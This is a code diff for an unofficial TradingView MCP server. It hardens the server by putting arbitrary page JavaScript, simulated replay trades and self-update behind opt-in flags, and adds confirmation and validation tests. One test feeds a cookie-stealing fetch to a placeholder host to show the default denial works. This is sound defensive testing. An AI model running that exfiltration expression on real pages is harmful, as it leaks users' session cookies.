 import { evaluate, evaluateAsync, getClient, safeString } from '../connection.js';
 
+function requirePaneIndex(index) {
+  // Number(null) and Number('') are 0, which would silently target pane 0 —
+  // reject nullish/blank explicitly so a missing index is an error, not pane 0.
+  const idx = Number(index);
+  if (index === null || index === '' || !Number.isInteger(idx) || idx < 0) {
+    throw new Error(`index must be a non-negative integer, got: ${index}`);
+  }
+  return idx;
+}
+
 const CWC = 'window.TradingViewApi._chartWidgetCollection';
 
 const LAYOUT_NAMES = {
@@ -113,7 +123,7 @@ export async function setLayout({ layout }) {
  * Focus a specific pane by index.
  */
 export async function focus({ index }) {
-  const idx = Number(index);
+  const idx = requirePaneIndex(index);
   const result = await evaluate(`
     (function() {
       var cwc = ${CWC};
@@ -135,7 +145,7 @@ export async function focus({ index }) {
  * Works by focusing the pane, then using the active chart's setSymbol.
  */
 export async function setSymbol({ index, symbol }) {
-  const idx = Number(index);
+  const idx = requirePaneIndex(index);
 
   // Focus the target pane first
   await focus({ index: idx });

--- a/src/core/pine.js
+++ b/src/core/pine.js
@@ -244,7 +244,19 @@ export async function check({ source }) {
 
 // ── Functions requiring TradingView connection ──
 
-export async function getSource() {
+/**
+ * Optionally truncate source to a character budget. Returns the (possibly
+ * truncated) text plus a flag. max_chars == null (the default) means no cap, so
+ * the historical full-source behavior is preserved for callers that need to edit.
+ */
+export function capSource(source, max_chars) {
+  if (max_chars == null) return { source, truncated: false };
+  const n = Number(max_chars);
+  if (!Number.isFinite(n) || n <= 0 || source.length <= n) return { source, truncated: false };
+  return { source: source.slice(0, n), truncated: true };
+}
+
+export async function getSource({ max_chars } = {}) {
   const editorReady = await ensurePineEditorOpen();
   if (!editorReady) throw new Error('Could not open Pine Editor or Monaco not found in React fiber tree.');
 
@@ -260,7 +272,16 @@ export async function getSource() {
     throw new Error('Monaco editor found but getValue() returned null.');
   }
 
-  return { success: true, source, line_count: source.split('\n').length, char_count: source.length };
+  const { source: returned, truncated } = capSource(source, max_chars);
+  return {
+    success: true,
+    source: returned,
+    // line_count / char_count always describe the FULL source so a caller that
+    // capped the output still learns the real size on the chart.
+    line_count: source.split('\n').length,
+    char_count: source.length,
+    ...(truncated && { truncated: true, returned_chars: returned.length }),
+  };
 }
 
 export async function setSource({ source }) {

--- a/src/core/replay.js
+++ b/src/core/replay.js
@@ -2,6 +2,7 @@
  * Core replay mode logic.
  */
 import { evaluate as _evaluate, getReplayApi as _getReplayApi } from '../connection.js';
+import { requireReplayTrading } from '../capabilities.js';
 
 export const VALID_AUTOPLAY_DELAYS = [100, 143, 200, 300, 1000, 2000, 3000, 5000, 10000];
 
@@ -104,6 +105,10 @@ export async function stop({ _deps } = {}) {
 }
 
 export async function trade({ action, _deps }) {
+  requireReplayTrading(_deps?.env);
+  if (!['buy', 'sell', 'close'].includes(action)) {
+    throw new Error('Invalid action. Use: buy, sell, or close');
+  }
   const { evaluate, getReplayApi } = _resolve(_deps);
   const rp = await getReplayApi();
   const started = await evaluate(wv(`${rp}.isReplayStarted()`));
@@ -111,8 +116,7 @@ export async function trade({ action, _deps }) {
 
   if (action === 'buy') await evaluate(`${rp}.buy()`);
   else if (action === 'sell') await evaluate(`${rp}.sell()`);
-  else if (action === 'close') await evaluate(`${rp}.closePosition()`);
-  else throw new Error('Invalid action. Use: buy, sell, or close');
+  else await evaluate(`${rp}.closePosition()`);
 
   const position = await evaluate(wv(`${rp}.position()`));
   const pnl = await evaluate(wv(`${rp}.realizedPL()`));

--- a/src/core/ui.js
+++ b/src/core/ui.js
@@ -2,6 +2,7 @@
  * Core UI automation logic.
  */
 import { evaluate, evaluateAsync, getClient } from '../connection.js';
+import { requireArbitraryPageJs } from '../capabilities.js';
 
 export async function click({ by, value }) {
   const escaped = JSON.stringify(value);
@@ -296,7 +297,12 @@ export async function findElement({ query, strategy }) {
   return { success: true, query, strategy: strat, count: results?.length || 0, elements: results || [] };
 }
 
-export async function uiEvaluate({ expression }) {
-  const result = await evaluate(expression);
+export async function uiEvaluate({ expression, _deps } = {}) {
+  requireArbitraryPageJs(_deps?.env);
+  if (typeof expression !== 'string' || expression.trim().length === 0) {
+    throw new Error('expression must be a non-empty string');
+  }
+  const runEvaluate = _deps?.evaluate || evaluate;
+  const result = await runEvaluate(expression);
   return { success: true, result };
 }

--- a/src/core/update.js
+++ b/src/core/update.js
@@ -8,6 +8,7 @@ import { execSync as _execSync } from 'child_process';
 import { existsSync as _existsSync } from 'fs';
 import { dirname, join } from 'path';
 import { fileURLToPath } from 'url';
+import { requireSelfUpdate } from '../capabilities.js';
 
 // src/core/update.js -> repo root, independent of process.cwd()
 const REPO_ROOT = dirname(dirname(dirname(fileURLToPath(import.meta.url))));
@@ -21,6 +22,9 @@ function _resolve(deps) {
 }
 
 export async function update({ _deps } = {}) {
+  // Capability gate first: refuse before any git/network/npm side effect unless
+  // the operator deliberately opted in. tv_update pulls and runs remote code.
+  requireSelfUpdate(_deps?.env);
   const { execSync, existsSync, repoRoot } = _resolve(_deps);
   const git = (args, timeout = 15000) =>
     execSync(`git ${args}`, { cwd: repoRoot, timeout, stdio: ['ignore', 'pipe', 'pipe'] }).toString().trim();

--- a/src/core/watchlist.js
+++ b/src/core/watchlist.js
@@ -7,6 +7,23 @@
  */
 import { evaluate, evaluateAsync, getClient } from '../connection.js';
 
+function requireSymbol(symbol) {
+  if (typeof symbol !== 'string' || symbol.trim() === '') {
+    throw new Error('symbol must be a non-empty string');
+  }
+}
+
+function requireSymbolList(symbols) {
+  if (!Array.isArray(symbols) || symbols.length === 0) {
+    throw new Error('symbols must be a non-empty array');
+  }
+  for (const s of symbols) {
+    if (typeof s !== 'string' || s.trim() === '') {
+      throw new Error('each symbol must be a non-empty string');
+    }
+  }
+}
+
 // TV renamed the right-rail button: current builds use data-name="base" with
 // aria-label "Watchlist, details, and news"; older builds used
 // data-name="base-watchlist-widget-button" / aria-label "Watchlist".
@@ -116,6 +133,7 @@ export async function get() {
 }
 
 export async function add({ symbol }) {
+  requireSymbol(symbol);
   const c = await getClient();
   await ensureWatchlistOpen();
 
@@ -158,6 +176,7 @@ export async function add({ symbol }) {
 }
 
 export async function addBulk({ symbols }) {
+  requireSymbolList(symbols);
   const results = [];
   for (const symbol of symbols) {
     try {
@@ -172,6 +191,7 @@ export async function addBulk({ symbols }) {
 }
 
 export async function remove({ symbols }) {
+  requireSymbolList(symbols);
   await ensureWatchlistOpen();
   const listInfo = await getActiveListInfo();
   if (!listInfo) throw new Error('Cannot read active watchlist metadata (React fiber probe failed)');

--- a/src/server.js
+++ b/src/server.js
@@ -60,6 +60,12 @@ Launch: tv_launch → auto-detect and start TradingView with CDP on any platform
 Panes: pane_list, pane_set_layout (s, 2h, 2v, 4, 6, 8), pane_focus, pane_set_symbol
 Tabs: tab_list, tab_new, tab_close, tab_switch
 
+SECURITY:
+- ui_evaluate executes arbitrary page JavaScript and is disabled by default
+- replay_trade changes simulated Bar Replay positions and is disabled by default
+- Replay navigation remains available without enabling simulated trades
+- This MCP cannot verify account type or guarantee demo/paper isolation
+
 CONTEXT MANAGEMENT:
 - ALWAYS use summary=true on data_get_ohlcv
 - ALWAYS use study_filter on pine tools when you know which indicator you want
@@ -88,6 +94,9 @@ registerTabTools(server);
 // Startup notice (stderr so it doesn't interfere with MCP stdio protocol)
 process.stderr.write('⚠  tradingview-mcp  |  Unofficial tool. Not affiliated with TradingView Inc. or Anthropic.\n');
 process.stderr.write('   Ensure your usage complies with TradingView\'s Terms of Use.\n\n');
+process.stderr.write('   Security: ui_evaluate arbitrary JavaScript is disabled by default.\n');
+process.stderr.write('   Security: replay_trade simulated position changes are disabled by default.\n');
+process.stderr.write('   Replay is not a guarantee of demo/paper isolation; disconnect real brokers before use.\n\n');
 
 // Start stdio transport
 const transport = new StdioServerTransport();

--- a/src/server.js
+++ b/src/server.js
@@ -63,6 +63,7 @@ Tabs: tab_list, tab_new, tab_close, tab_switch
 SECURITY:
 - ui_evaluate executes arbitrary page JavaScript and is disabled by default
 - replay_trade changes simulated Bar Replay positions and is disabled by default
+- tv_update pulls and runs remote code (git + npm ci) and is disabled by default
 - Replay navigation remains available without enabling simulated trades
 - This MCP cannot verify account type or guarantee demo/paper isolation
 
@@ -96,6 +97,7 @@ process.stderr.write('⚠  tradingview-mcp  |  Unofficial tool. Not affiliated w
 process.stderr.write('   Ensure your usage complies with TradingView\'s Terms of Use.\n\n');
 process.stderr.write('   Security: ui_evaluate arbitrary JavaScript is disabled by default.\n');
 process.stderr.write('   Security: replay_trade simulated position changes are disabled by default.\n');
+process.stderr.write('   Security: tv_update (pulls and runs remote code) is disabled by default.\n');
 process.stderr.write('   Replay is not a guarantee of demo/paper isolation; disconnect real brokers before use.\n\n');
 
 // Start stdio transport

--- a/src/tools/alerts.js
+++ b/src/tools/alerts.js
@@ -2,26 +2,28 @@ import { z } from 'zod';
 import { jsonResult } from './_format.js';
 import * as core from '../core/alerts.js';
 
-export function registerAlertTools(server) {
+export function registerAlertTools(server, { evaluate, evaluateAsync } = {}) {
+  const _deps = { evaluate, evaluateAsync };
   server.tool('alert_create', 'Create a price alert on the current chart symbol via TradingView\'s alert API', {
     condition: z.string().describe('Alert condition: "crossing", "greater_than", or "less_than"'),
     price: z.coerce.number().describe('Price level for the alert'),
     message: z.string().optional().describe('Alert message'),
   }, async ({ condition, price, message }) => {
-    try { return jsonResult(await core.create({ condition, price, message })); }
+    try { return jsonResult(await core.create({ condition, price, message, _deps })); }
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }
   });
 
   server.tool('alert_list', 'List active alerts', {}, async () => {
-    try { return jsonResult(await core.list()); }
+    try { return jsonResult(await core.list({ _deps })); }
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }
   });
 
-  server.tool('alert_delete', 'Delete a specific alert by id, or all active alerts', {
+  server.tool('alert_delete', `Delete a specific alert by id, or ALL active alerts. Deleting all is irreversible and requires confirm: "${core.DELETE_ALL_CONFIRMATION}" — a bare delete_all is refused.`, {
     alert_id: z.coerce.number().optional().describe('Alert id to delete (from alert_list)'),
-    delete_all: z.coerce.boolean().optional().describe('Delete all active alerts'),
-  }, async ({ alert_id, delete_all }) => {
-    try { return jsonResult(await core.deleteAlerts({ alert_id, delete_all })); }
+    delete_all: z.coerce.boolean().optional().describe('Delete all active alerts (requires the confirm token)'),
+    confirm: z.string().optional().describe(`Must equal "${core.DELETE_ALL_CONFIRMATION}" when delete_all is set`),
+  }, async ({ alert_id, delete_all, confirm }) => {
+    try { return jsonResult(await core.deleteAlerts({ alert_id, delete_all, confirm, _deps })); }
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }
   });
 }

--- a/src/tools/batch.js
+++ b/src/tools/batch.js
@@ -6,7 +6,7 @@ export function registerBatchTools(server) {
   server.tool('batch_run', 'Run an action across multiple symbols and/or timeframes', {
     symbols: z.array(z.string()).describe('Array of symbols to iterate (e.g., ["BTCUSD", "ETHUSD", "AAPL"])'),
     timeframes: z.array(z.string()).optional().describe('Array of timeframes (e.g., ["D", "60", "15"])'),
-    action: z.string().describe('Action to run: screenshot, get_ohlcv, get_strategy_results'),
+    action: z.enum(['screenshot', 'get_ohlcv', 'get_strategy_results']).describe('Action to run'),
     delay_ms: z.coerce.number().optional().describe('Delay between iterations in ms (default 2000)'),
     ohlcv_count: z.coerce.number().optional().describe('Bar count for get_ohlcv action (default 100)'),
   }, async ({ symbols, timeframes, action, delay_ms, ohlcv_count }) => {

--- a/src/tools/health.js
+++ b/src/tools/health.js
@@ -3,7 +3,7 @@ import { jsonResult } from './_format.js';
 import * as core from '../core/health.js';
 import { update } from '../core/update.js';
 
-export function registerHealthTools(server) {
+export function registerHealthTools(server, { env = process.env } = {}) {
   server.tool('tv_health_check', 'Check CDP connection to TradingView and return current chart state', {}, async () => {
     try { return jsonResult(await core.healthCheck()); }
     catch (err) { return jsonResult({ success: false, error: err.message, hint: 'TradingView is not running with CDP enabled. Use the tv_launch tool to start it automatically.' }, true); }
@@ -27,8 +27,8 @@ export function registerHealthTools(server) {
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }
   });
 
-  server.tool('tv_update', 'Update this MCP server to the latest version: git fast-forward of origin/main + npm ci when dependencies changed. Safe by design — refuses on non-git installs, dirty working trees, non-main branches, or diverged history. After a successful update the MCP server must be restarted to load the new code.', {}, async () => {
-    try { return jsonResult(await update({})); }
+  server.tool('tv_update', 'Update this MCP server to the latest version: git fast-forward of origin/main + npm ci when dependencies changed. DISABLED by default because it pulls and runs remote code; requires an explicit startup capability opt-in. Refuses on non-git installs, dirty working trees, non-main branches, or diverged history. After a successful update the MCP server must be restarted to load the new code.', {}, async () => {
+    try { return jsonResult(await update({ _deps: { env } })); }
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }
   });
 }

--- a/src/tools/pine.js
+++ b/src/tools/pine.js
@@ -3,8 +3,10 @@ import { jsonResult } from './_format.js';
 import * as core from '../core/pine.js';
 
 export function registerPineTools(server) {
-  server.tool('pine_get_source', 'Get current Pine Script source code from the editor', {}, async () => {
-    try { return jsonResult(await core.getSource()); }
+  server.tool('pine_get_source', 'Get current Pine Script source code from the editor. Can return 200KB+ on complex scripts — pass max_chars to cap the returned source (line_count/char_count still report the full size, and truncated:true flags a capped result).', {
+    max_chars: z.coerce.number().int().positive().optional().describe('Cap the returned source to this many characters (default: full source)'),
+  }, async ({ max_chars }) => {
+    try { return jsonResult(await core.getSource({ max_chars })); }
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }
   });
 

--- a/src/tools/replay.js
+++ b/src/tools/replay.js
@@ -2,7 +2,8 @@ import { z } from 'zod';
 import { jsonResult } from './_format.js';
 import * as core from '../core/replay.js';
 
-export function registerReplayTools(server) {
+export function registerReplayTools(server, { env = process.env, evaluate, getReplayApi } = {}) {
+  const _deps = { env, evaluate, getReplayApi };
   server.tool('replay_start', 'Start bar replay mode, optionally at a specific date', {
     date: z.string().optional().describe('Date to start replay from (YYYY-MM-DD format). If omitted, selects first available date.'),
   }, async ({ date }) => {
@@ -27,10 +28,10 @@ export function registerReplayTools(server) {
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }
   });
 
-  server.tool('replay_trade', 'Execute a trade action in replay mode (buy, sell, or close position)', {
-    action: z.string().describe('Trade action: buy, sell, or close'),
+  server.tool('replay_trade', 'SIMULATED: Change TradingView Bar Replay position state. Disabled by default; this does not prove paper/broker isolation.', {
+    action: z.unknown().optional().describe('Simulated Bar Replay action: buy, sell, or close'),
   }, async ({ action }) => {
-    try { return jsonResult(await core.trade({ action })); }
+    try { return jsonResult(await core.trade({ action, _deps })); }
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }
   });
 

--- a/src/tools/ui.js
+++ b/src/tools/ui.js
@@ -2,7 +2,7 @@ import { z } from 'zod';
 import { jsonResult } from './_format.js';
 import * as core from '../core/ui.js';
 
-export function registerUiTools(server) {
+export function registerUiTools(server, { env = process.env, evaluate } = {}) {
   server.tool('ui_click', 'Click a UI element by aria-label, data-name, text content, or class substring', {
     by: z.enum(['aria-label', 'data-name', 'text', 'class-contains']).describe('Selector strategy'),
     value: z.string().describe('Value to match against the chosen selector strategy'),
@@ -85,10 +85,10 @@ export function registerUiTools(server) {
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }
   });
 
-  server.tool('ui_evaluate', 'Execute JavaScript code in the TradingView page context for advanced automation', {
-    expression: z.string().describe('JavaScript expression to evaluate in the page context. Wrap in IIFE for complex logic.'),
+  server.tool('ui_evaluate', 'DANGEROUS: Execute arbitrary JavaScript in the TradingView page context. Disabled by default; requires an explicit startup capability opt-in.', {
+    expression: z.string().min(1).describe('JavaScript expression to evaluate in the page context. Wrap in IIFE for complex logic.'),
   }, async ({ expression }) => {
-    try { return jsonResult(await core.uiEvaluate({ expression })); }
+    try { return jsonResult(await core.uiEvaluate({ expression, _deps: { env, evaluate } })); }
     catch (err) { return jsonResult({ success: false, error: err.message }, true); }
   });
 }

--- a/tests/alerts.test.js
+++ b/tests/alerts.test.js
@@ -1,0 +1,122 @@
+/**
+ * Tests for src/core/alerts.js.
+ * Focus: the delete_all confirmation guard (irreversible bulk delete must not fire
+ * from a bare boolean), plus create validation and dependency injection.
+ */
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import { create, list, deleteAlerts, DELETE_ALL_CONFIRMATION } from '../src/core/alerts.js';
+import { getRegisteredHandler } from '../src/cli/router.js';
+import '../src/cli/commands/alerts.js';
+
+// Build DI deps with spies. evaluate handles create/delete; evaluateAsync handles list.
+function mockDeps({ alerts = [], deleteOk = true } = {}) {
+  const state = { evaluateCalls: 0, evaluateAsyncCalls: 0, lastDeleteIds: null };
+  const deps = {
+    evaluate: async (js) => {
+      state.evaluateCalls++;
+      if (js.includes('delete_alerts')) {
+        const m = js.match(/alert_ids:\s*(\[[^\]]*\])/);
+        state.lastDeleteIds = m ? JSON.parse(m[1]) : null;
+        return { ok: deleteOk, status: deleteOk ? 200 : 500, response: '' };
+      }
+      // create path
+      return { success: true, source: 'internal_api', alert_id: 999 };
+    },
+    evaluateAsync: async () => {
+      state.evaluateAsyncCalls++;
+      return { alerts };
+    },
+  };
+  return { deps, state };
+}
+
+describe('deleteAlerts() — bulk delete confirmation guard', () => {
+  it('refuses delete_all without a confirmation token, before any network call', async () => {
+    const { deps, state } = mockDeps({ alerts: [{ alert_id: 1 }, { alert_id: 2 }] });
+    const r = await deleteAlerts({ delete_all: true, _deps: deps });
+    assert.equal(r.success, false);
+    assert.match(r.error, /confirmation/i);
+    assert.equal(state.evaluateCalls, 0, 'no delete request issued');
+    assert.equal(state.evaluateAsyncCalls, 0, 'not even the list request issued');
+  });
+
+  it('refuses delete_all with a near-match confirmation token', async () => {
+    for (const confirm of [DELETE_ALL_CONFIRMATION.toLowerCase(), `${DELETE_ALL_CONFIRMATION} `, 'true', 'yes']) {
+      const { deps, state } = mockDeps({ alerts: [{ alert_id: 1 }] });
+      const r = await deleteAlerts({ delete_all: true, confirm, _deps: deps });
+      assert.equal(r.success, false);
+      assert.equal(state.evaluateCalls, 0);
+    }
+  });
+
+  it('deletes all alerts with the exact confirmation token', async () => {
+    const { deps, state } = mockDeps({ alerts: [{ alert_id: 1 }, { alert_id: 2 }, { alert_id: 3 }] });
+    const r = await deleteAlerts({ delete_all: true, confirm: DELETE_ALL_CONFIRMATION, _deps: deps });
+    assert.equal(r.success, true);
+    assert.equal(r.deleted_count, 3);
+    assert.deepEqual(r.alert_ids, [1, 2, 3]);
+    assert.deepEqual(state.lastDeleteIds, [1, 2, 3]);
+    assert.equal(state.evaluateAsyncCalls, 1, 'listed once to resolve ids');
+  });
+
+  it('deletes a single alert by id without any confirmation token', async () => {
+    const { deps, state } = mockDeps();
+    const r = await deleteAlerts({ alert_id: 42, _deps: deps });
+    assert.equal(r.success, true);
+    assert.equal(r.deleted_count, 1);
+    assert.deepEqual(state.lastDeleteIds, [42]);
+    assert.equal(state.evaluateAsyncCalls, 0, 'no list needed for a targeted delete');
+  });
+
+  it('reports when there is nothing to delete', async () => {
+    const { deps } = mockDeps();
+    const r = await deleteAlerts({ _deps: deps });
+    assert.equal(r.success, false);
+    assert.match(r.error, /Provide delete_all/);
+  });
+});
+
+describe('create() — validation and DI', () => {
+  it('rejects a non-finite price before touching the page', async () => {
+    const { deps, state } = mockDeps();
+    await assert.rejects(() => create({ price: 'not-a-number', _deps: deps }), /finite number/);
+    assert.equal(state.evaluateCalls, 0);
+  });
+
+  it('passes a valid alert through the injected evaluate', async () => {
+    const { deps, state } = mockDeps();
+    const r = await create({ condition: 'greater_than', price: 100, _deps: deps });
+    assert.equal(r.success, true);
+    assert.equal(state.evaluateCalls, 1);
+  });
+});
+
+describe('list() — DI', () => {
+  it('reports the injected alert set', async () => {
+    const { deps } = mockDeps({ alerts: [{ alert_id: 7 }, { alert_id: 8 }] });
+    const r = await list({ _deps: deps });
+    assert.equal(r.success, true);
+    assert.equal(r.alert_count, 2);
+  });
+});
+
+describe('alert delete — registered CLI boundary', () => {
+  it('refuses --all without --confirm before any network call', async () => {
+    const { deps, state } = mockDeps({ alerts: [{ alert_id: 1 }] });
+    const handler = getRegisteredHandler('alert', 'delete');
+    const r = await handler({ all: true }, [], deps);
+    assert.equal(r.success, false);
+    assert.match(r.error, /confirmation/i);
+    assert.equal(state.evaluateCalls, 0);
+    assert.equal(state.evaluateAsyncCalls, 0);
+  });
+
+  it('deletes all through the CLI with the exact --confirm token', async () => {
+    const { deps } = mockDeps({ alerts: [{ alert_id: 1 }, { alert_id: 2 }] });
+    const handler = getRegisteredHandler('alert', 'delete');
+    const r = await handler({ all: true, confirm: DELETE_ALL_CONFIRMATION }, [], deps);
+    assert.equal(r.success, true);
+    assert.equal(r.deleted_count, 2);
+  });
+});

--- a/tests/capabilities.test.js
+++ b/tests/capabilities.test.js
@@ -1,0 +1,107 @@
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import {
+  ARBITRARY_PAGE_JS_ACK,
+  ARBITRARY_PAGE_JS_ENV,
+  requireArbitraryPageJs,
+} from '../src/capabilities.js';
+import { uiEvaluate } from '../src/core/ui.js';
+import { registerUiTools } from '../src/tools/ui.js';
+import { getRegisteredHandler } from '../src/cli/router.js';
+import '../src/cli/commands/ui.js';
+
+const enabledEnv = { [ARBITRARY_PAGE_JS_ENV]: ARBITRARY_PAGE_JS_ACK };
+
+function registeredUiEvaluate(deps) {
+  const tools = new Map();
+  const server = {
+    tool(name, description, schema, handler) {
+      tools.set(name, { description, schema, handler });
+    },
+  };
+  registerUiTools(server, deps);
+  return tools.get('ui_evaluate');
+}
+
+describe('arbitrary page JavaScript capability', () => {
+  it('is denied by default before CDP evaluation', async () => {
+    let evaluated = false;
+
+    await assert.rejects(
+      () => uiEvaluate({
+        expression: "fetch('https://example.invalid/?cookie=' + document.cookie)",
+        _deps: { env: {}, evaluate: async () => { evaluated = true; } },
+      }),
+      new RegExp(`${ARBITRARY_PAGE_JS_ENV}=${ARBITRARY_PAGE_JS_ACK}`),
+    );
+
+    assert.equal(evaluated, false);
+  });
+
+  it('rejects truthy and near-match configuration values', () => {
+    for (const value of ['1', 'true', ARBITRARY_PAGE_JS_ACK.toLowerCase(), `${ARBITRARY_PAGE_JS_ACK} `]) {
+      assert.throws(() => requireArbitraryPageJs({ [ARBITRARY_PAGE_JS_ENV]: value }), /disabled/);
+    }
+  });
+
+  it('allows deliberate opt-in and preserves the exact expression', async () => {
+    const expression = "(() => ({ quote: '\"', template: `\${notExecuted}` }))()";
+    let received;
+
+    const result = await uiEvaluate({
+      expression,
+      _deps: {
+        env: enabledEnv,
+        evaluate: async (value) => { received = value; return 42; },
+      },
+    });
+
+    assert.equal(received, expression);
+    assert.deepEqual(result, { success: true, result: 42 });
+  });
+
+  it('rejects malformed expressions before CDP evaluation when enabled', async () => {
+    let calls = 0;
+    const deps = { env: enabledEnv, evaluate: async () => { calls++; } };
+
+    await assert.rejects(() => uiEvaluate({ expression: '', _deps: deps }), /non-empty string/);
+    await assert.rejects(() => uiEvaluate({ expression: '   ', _deps: deps }), /non-empty string/);
+    await assert.rejects(() => uiEvaluate({ expression: 123, _deps: deps }), /non-empty string/);
+    assert.equal(calls, 0);
+  });
+
+  it('exposes the risk and default denial through the MCP tool boundary', async () => {
+    const tool = registeredUiEvaluate({ env: {}, evaluate: async () => assert.fail('must not evaluate') });
+    const response = await tool.handler({ expression: 'globalThis.compromised = true' });
+    const body = JSON.parse(response.content[0].text);
+
+    assert.match(tool.description, /DANGEROUS.*Disabled by default/);
+    assert.equal(response.isError, true);
+    assert.equal(body.success, false);
+    assert.match(body.error, new RegExp(ARBITRARY_PAGE_JS_ENV));
+  });
+
+  it('preserves MCP tool behavior after deliberate opt-in', async () => {
+    const tool = registeredUiEvaluate({ env: enabledEnv, evaluate: async (expression) => expression.length });
+    const response = await tool.handler({ expression: '1 + 1' });
+    const body = JSON.parse(response.content[0].text);
+
+    assert.equal(response.isError, undefined);
+    assert.deepEqual(body, { success: true, result: 5 });
+  });
+
+  it('denies the actual CLI ui eval handler before CDP access', async () => {
+    let evaluated = false;
+    const handler = getRegisteredHandler('ui', 'eval');
+
+    await assert.rejects(
+      () => handler({}, ['globalThis.compromised', '=', 'true'], {
+        env: {},
+        evaluate: async () => { evaluated = true; },
+      }),
+      new RegExp(ARBITRARY_PAGE_JS_ENV),
+    );
+
+    assert.equal(evaluated, false);
+  });
+});

--- a/tests/capabilities.test.js
+++ b/tests/capabilities.test.js
@@ -90,16 +90,27 @@ describe('arbitrary page JavaScript capability', () => {
     assert.deepEqual(body, { success: true, result: 5 });
   });
 
-  it('denies the actual CLI ui eval handler before CDP access', async () => {
+  it('denies present and missing CLI ui eval expressions before CDP access', async () => {
+    let evaluated = false;
+    const handler = getRegisteredHandler('ui', 'eval');
+
+    for (const positionals of [['globalThis.compromised', '=', 'true'], []]) {
+      await assert.rejects(
+        () => handler({}, positionals, { env: {}, evaluate: async () => { evaluated = true; } }),
+        new RegExp(ARBITRARY_PAGE_JS_ENV),
+      );
+    }
+
+    assert.equal(evaluated, false);
+  });
+
+  it('validates a missing CLI expression only after exact opt-in', async () => {
     let evaluated = false;
     const handler = getRegisteredHandler('ui', 'eval');
 
     await assert.rejects(
-      () => handler({}, ['globalThis.compromised', '=', 'true'], {
-        env: {},
-        evaluate: async () => { evaluated = true; },
-      }),
-      new RegExp(ARBITRARY_PAGE_JS_ENV),
+      () => handler({}, [], { env: enabledEnv, evaluate: async () => { evaluated = true; } }),
+      /non-empty string/,
     );
 
     assert.equal(evaluated, false);

--- a/tests/input_validation.test.js
+++ b/tests/input_validation.test.js
@@ -1,0 +1,62 @@
+/**
+ * Input-validation guards that must reject BEFORE any chart/CDP side effect.
+ * These run offline: each guard throws before the function touches connection.js,
+ * so a live TradingView is never needed.
+ */
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import { focus, setSymbol } from '../src/core/pane.js';
+import { batchRun, BATCH_ACTIONS, MAX_BATCH_ITERATIONS } from '../src/core/batch.js';
+import { add, addBulk, remove } from '../src/core/watchlist.js';
+
+describe('pane index validation', () => {
+  it('rejects non-numeric, negative, and non-integer indices', async () => {
+    for (const bad of ['abc', undefined, null, NaN, -1, 1.5, Infinity]) {
+      await assert.rejects(() => focus({ index: bad }), /index must be/, `focus(${bad})`);
+      await assert.rejects(() => setSymbol({ index: bad, symbol: 'AAPL' }), /index must be/, `setSymbol(${bad})`);
+    }
+  });
+});
+
+describe('batch_run validation', () => {
+  it('rejects an empty or non-array symbol list', async () => {
+    await assert.rejects(() => batchRun({ symbols: [], action: 'screenshot' }), /non-empty array/);
+    await assert.rejects(() => batchRun({ symbols: 'AAPL', action: 'screenshot' }), /non-empty array/);
+  });
+
+  it('rejects an unknown action before switching any symbol', async () => {
+    await assert.rejects(
+      () => batchRun({ symbols: ['AAPL'], action: 'delete_everything' }),
+      new RegExp(BATCH_ACTIONS.join('.*')),
+    );
+  });
+
+  it('rejects a run that exceeds the iteration cap', async () => {
+    const symbols = Array.from({ length: MAX_BATCH_ITERATIONS + 1 }, (_, i) => `SYM${i}`);
+    await assert.rejects(() => batchRun({ symbols, action: 'screenshot' }), /over the .* cap/);
+  });
+
+  it('counts symbols × timeframes against the cap', async () => {
+    const symbols = Array.from({ length: 26 }, (_, i) => `SYM${i}`); // 26 × 2 = 52 > 50
+    await assert.rejects(
+      () => batchRun({ symbols, timeframes: ['D', '60'], action: 'screenshot' }),
+      /over the .* cap/,
+    );
+  });
+});
+
+describe('watchlist symbol validation', () => {
+  it('rejects a missing or blank single symbol', async () => {
+    for (const bad of [undefined, '', '   ', 42]) {
+      await assert.rejects(() => add({ symbol: bad }), /non-empty string/, `add(${bad})`);
+    }
+  });
+
+  it('rejects an empty or non-array symbol list for add_bulk and remove', async () => {
+    for (const fn of [addBulk, remove]) {
+      await assert.rejects(() => fn({ symbols: [] }), /non-empty array/);
+      await assert.rejects(() => fn({ symbols: undefined }), /non-empty array/);
+      await assert.rejects(() => fn({ symbols: ['AAPL', ''] }), /non-empty string/);
+    }
+  });
+});

--- a/tests/pine_source.test.js
+++ b/tests/pine_source.test.js
@@ -1,0 +1,41 @@
+/**
+ * Tests for capSource() in src/core/pine.js — the pine_get_source output cap.
+ * Pure string logic, no chart/CDP needed.
+ */
+import { describe, it } from 'node:test';
+import assert from 'node:assert/strict';
+import { capSource } from '../src/core/pine.js';
+
+const SRC = 'abcdefghij'; // 10 chars
+
+describe('capSource()', () => {
+  it('returns full source untruncated when no cap is given', () => {
+    assert.deepEqual(capSource(SRC), { source: SRC, truncated: false });
+    assert.deepEqual(capSource(SRC, null), { source: SRC, truncated: false });
+    assert.deepEqual(capSource(SRC, undefined), { source: SRC, truncated: false });
+  });
+
+  it('does not truncate when the cap is >= the length', () => {
+    assert.deepEqual(capSource(SRC, 10), { source: SRC, truncated: false });
+    assert.deepEqual(capSource(SRC, 999), { source: SRC, truncated: false });
+  });
+
+  it('truncates to exactly max_chars when the source is longer', () => {
+    const r = capSource(SRC, 4);
+    assert.equal(r.source, 'abcd');
+    assert.equal(r.truncated, true);
+    assert.equal(r.source.length, 4);
+  });
+
+  it('ignores non-positive and non-finite caps (returns full source)', () => {
+    for (const bad of [0, -5, NaN, Infinity, 'x']) {
+      assert.deepEqual(capSource(SRC, bad), { source: SRC, truncated: false }, `cap=${bad}`);
+    }
+  });
+
+  it('coerces a numeric-string cap', () => {
+    const r = capSource(SRC, '3');
+    assert.equal(r.source, 'abc');
+    assert.equal(r.truncated, true);
+  });
+});

--- a/tests/replay.test.js
+++ b/tests/replay.test.js
@@ -5,7 +5,20 @@
 import { describe, it } from 'node:test';
 import assert from 'node:assert/strict';
 import { readFileSync } from 'node:fs';
